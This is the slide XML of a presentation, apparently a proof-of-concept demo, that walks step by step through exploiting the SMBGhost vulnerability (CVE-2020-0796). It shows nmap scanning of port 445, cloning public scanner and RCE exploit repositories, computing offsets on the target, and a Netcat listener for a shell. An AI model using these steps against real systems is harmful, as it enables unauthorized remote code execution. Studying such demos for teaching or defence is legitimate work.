                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Victims Firewall must turned-off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="2800" b="1">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F155CAF-4693-4962-8167-8FDD36A3FBBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5553635" y="3738282"/>
            <a:ext cx="0" cy="2675965"/>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4F012D2-D573-4DCB-B0AB-3B1EA961A201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9695881" y="770746"/>
            <a:ext cx="0" cy="267596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52921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093FBA1-5AB8-4DC0-BE40-4A053E3C427F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634276" y="4892358"/>
            <a:ext cx="3766272" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STEP 01</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01192401-AA73-4E71-B58A-A3EAFCC75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86" y="385011"/>
            <a:ext cx="10553223" cy="3799159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67"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292D28-592E-4787-BB05-4A59F3DA7A2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4878784" y="4824249"/>
            <a:ext cx="6673136" cy="1461780"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use Nmap to scan target for available ports and confirm that 445/TCP is open .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COMMAND: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>target_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;”</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230633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92B53-32C3-4969-84F3-2972A09CDB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273361" y="3703974"/>
            <a:ext cx="4337858" cy="2398713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STEP 02 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Scan the victim for Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="4000">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D066681-4CCF-442F-90A3-69A71792805A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="11557"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{357D13AF-1567-41D1-8FF6-89DF002CFC7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314604" y="3703975"/>
            <a:ext cx="6039196" cy="2398713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Clone the tool from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" err="1">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BurnitKomoni</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COMMAND : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ButrintKomoni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/cve-2020-0796</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use the tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COMMAND : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“python3 cve-2020-0796-scanner.py &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>target_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;”</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="2000" b="1">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC7A2C32-7294-4C90-AF54-314ECE4DDF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4909625" y="3428999"/>
            <a:ext cx="0" cy="27748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05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57E386-776E-4C3D-AD41-9C041F51D55C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315431" y="930246"/>
            <a:ext cx="4153626" cy="2174091"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STEP 03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Remote code execution POC with          ZecOps exploit code.</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="3400">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 1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4CD04DD3-FC6F-48C9-A64F-D90B949C53C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025843" y="3773008"/>
            <a:ext cx="4075054" cy="2741213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Download the RCE POC toolset from ZecOps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> : “git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/ZecOps/CVE-2020-0796-RCE-POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="si-LK" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C50254-E491-4DCC-A8D4-D54D11F45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545" y="930246"/>
            <a:ext cx="5051320" cy="1591166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46FC8A09-6E6F-46C0-B571-A127ECCB3BDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6630545" y="3473850"/>
            <a:ext cx="5074921" cy="1591166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3534B8-8DA3-4DD3-B849-3F92F7CFFE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="3254188"/>
            <a:ext cx="49538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3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9C76FE-BF71-443A-93AA-DD32691D1DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="1083212"/>
            <a:ext cx="5157216" cy="4811561"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STEP 04 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Execute the  “calc_target_offset.bat” script on the target computer to obtain offset values needed for exploit.</a:t>
            </a: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300">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NB : These values are not random numbers, and they are specific for the version of windows, this implementation is only for the demonstration purpose of POC, and these values can be automatically obtained in the exploit by identifying the version of victim windows</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="1700">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E653AA03-1A52-44DB-9B50-46051109D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036" y="633047"/>
            <a:ext cx="5290976" cy="5261726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80DE717C-4945-40B6-967C-73E96395C2C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301966" y="3429000"/>
            <a:ext cx="579403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33519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2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30AA0E-B305-4A16-8F35-5BEF66CDAD3A}"/>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200" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STEP 05 : Updating the relevant fields of exploit with retrieved offsets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B9C153-8571-4CA9-A94F-0BE09285D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918" y="1315919"/>
            <a:ext cx="8417859" cy="4226162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383641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E4F90-3151-4380-B8E4-F1BA34758D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289305" y="3415754"/>
            <a:ext cx="9471956" cy="1137111"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4200" b="1">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STEP 06 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200">
                <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Setting up the Netcat listener.</a:t>
            </a:r>
            <a:endParaRPr lang="si-LK" sz="4200">
              <a:latin typeface="Gill Sans Nova" panose="020B0602020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C8B844-42D0-4517-9217-2D48FC453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304" y="1173707"/>
            <a:ext cx="6268407" cy="2065992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA305E6-5CF0-408F-9895-933A3A50CDAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
